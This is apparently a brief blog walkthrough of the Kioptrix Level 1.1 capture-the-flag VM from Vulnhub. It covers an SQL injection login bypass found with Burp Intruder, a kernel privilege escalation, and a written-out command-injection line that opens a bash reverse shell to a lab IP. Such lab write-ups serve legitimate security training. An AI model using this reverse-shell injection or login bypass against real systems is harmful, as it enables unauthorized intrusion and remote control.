Kioptrix: Level 1.1 Walkthrough – Vulnhub

Name: Kioptrix: Level 1.1
Date released: 17 Feb 2010
Author: Kioptrix
Download

Initial scan results below

Found a login page running on port 80/Apache

Tried a bunch of normal username combos such as admin:admin admin:password etc.

Tried a couple SQLi attempts in the username and password field but couldn’t get an error message

Decided to use Burp’s Intruder. Tested the uname field against a list of known SQL injection commands.

Inspected the shorter length responses and found that a couple of the SQL injection payloads bypassed authentication.

After doing some initial testing a bash reverse shell looked promising

;bash -i >& /dev/tcp/10.11.1.5/8080 0>&1

low priv shell

Privilege Escalation

Found and executed a Linux Kernel 2.4/2.6 Ring0 Privilege escalation exploit found here

Root!! This was fun and slightly harder than Level 1. On to Level 1.2!

Leave a Reply